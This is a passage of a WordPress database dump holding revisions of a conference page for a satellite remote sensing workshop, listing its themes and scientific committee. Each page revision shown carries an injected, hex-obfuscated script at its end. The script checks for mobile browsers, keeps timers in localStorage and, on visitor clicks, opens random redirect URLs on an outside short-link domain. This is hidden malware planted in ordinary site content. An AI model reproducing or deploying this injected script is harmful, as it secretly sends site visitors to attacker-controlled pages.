Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-04 21:00:14','2022-11-04 21:00:14','',2876,'https://gsw2023.com/?p=3018',0,'revision','',0),
(3019,1,'2022-11-04 21:04:05','2022-11-04 21:04:05','','ws19m2','','inherit','open','closed','','ws19m2','','','2022-11-04 21:04:05','2022-11-04 21:04:05','',2996,'https://gsw2023.com/wp-content/uploads/2022/11/ws19m2.jpg',0,'attachment','image/jpeg',0),
(3020,1,'2022-11-04 21:09:50','2022-11-04 21:09:50','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\n<p>&nbsp;</p>\n<h5><strong> Satellite Photogrammetry</strong></h5>\n<ul>\n<li>Stereo/multi-view image-based 3D reconstruction</li>\n<li>Sensor modeling and calibration</li>\n<li>Off-nadir satellite image geometry and true orthorectification</li>\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Urban Remote Sensing</strong></h5>\n<ul>\n<li>Thermal remote sensing and heat-loss assessment</li>\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\n<li>Urban area change detection and 2D/3D base map updating</li>\n<li>Disaster assessment, management, and mitigation</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Image integration and data fusion</strong></h5>\n<ul>\n<li>Sensor fusion and multi-modal image processing</li>\n<li>LiDAR and Multispectral data integration</li>\n<li>Hyperspectral image processing and data fusion</li>\n<li>Optical-SAR image integration</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\n<ul>\n<li>Water Resources and Management</li>\n<li>Wastewater and solid waste monitoring</li>\n<li>Weather/atmosphere and climate change</li>\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\n<li>Environmental health applications</li>\n<li>Coastal erosion and cryosphere</li>\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\n<li>Cloud-based image analysis and Google Earth Engine</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\n<ul>\n<li>Planetary Remote Sensing data processing and information extraction</li>\n<li>Cubesat-based earth observation missions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong> Scientific Committee:</strong></h5>\n<ul>\n<li>Orhan ALTAN, Istanbul Technical University</li>\n<li>Ammatzia Peled, University of Haifa</li>\n<li>Yun Zhang, University of New Brunswick</li>\n<li>Rongxing (Ron) Li, Tongji University</li>\n<li>Marco Scaioni, University Politecnico Milano</li>\n<li>Francesco Pirotti, University of Padova</li>\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\n<li>BAHRAM SALEHI, State University of New York</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2022-11-04 21:09:50','2022-11-04 21:09:50','',2996,'https://gsw2023.com/?p=3020',0,'revision','',0),
(3021,1,'2022-11-04 21:10:26','2022-11-04 21:10:26','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\n<p>&nbsp;</p>\n<h5><strong> Satellite Photogrammetry</strong></h5>\n<ul>\n<li>Stereo/multi-view image-based 3D reconstruction</li>\n<li>Sensor modeling and calibration</li>\n<li>Off-nadir satellite image geometry and true orthorectification</li>\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Urban Remote Sensing</strong></h5>\n<ul>\n<li>Thermal remote sensing and heat-loss assessment</li>\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\n<li>Urban area change detection and 2D/3D base map updating</li>\n<li>Disaster assessment, management, and mitigation</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Image integration and data fusion</strong></h5>\n<ul>\n<li>Sensor fusion and multi-modal image processing</li>\n<li>LiDAR and Multispectral data integration</li>\n<li>Hyperspectral image processing and data fusion</li>\n<li>Optical-SAR image integration</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\n<ul>\n<li>Water Resources and Management</li>\n<li>Wastewater and solid waste monitoring</li>\n<li>Weather/atmosphere and climate change</li>\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\n<li>Environmental health applications</li>\n<li>Coastal erosion and cryosphere</li>\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\n<li>Cloud-based image analysis and Google Earth Engine</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\n<ul>\n<li>Planetary Remote Sensing data processing and information extraction</li>\n<li>Cubesat-based earth observation missions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong> Scientific Committee:</strong></h5>\n<ul>\n<li>Orhan ALTAN, Istanbul Technical University</li>\n<li>Ammatzia Peled, University of Haifa</li>\n<li>Yun Zhang, University of New Brunswick</li>\n<li>Rongxing (Ron) Li, Tongji University</li>\n<li>Marco Scaioni, University Politecnico Milano</li>\n<li>Francesco Pirotti, University of Padova</li>\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\n<li>BAHRAM SALEHI, State University of New York</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 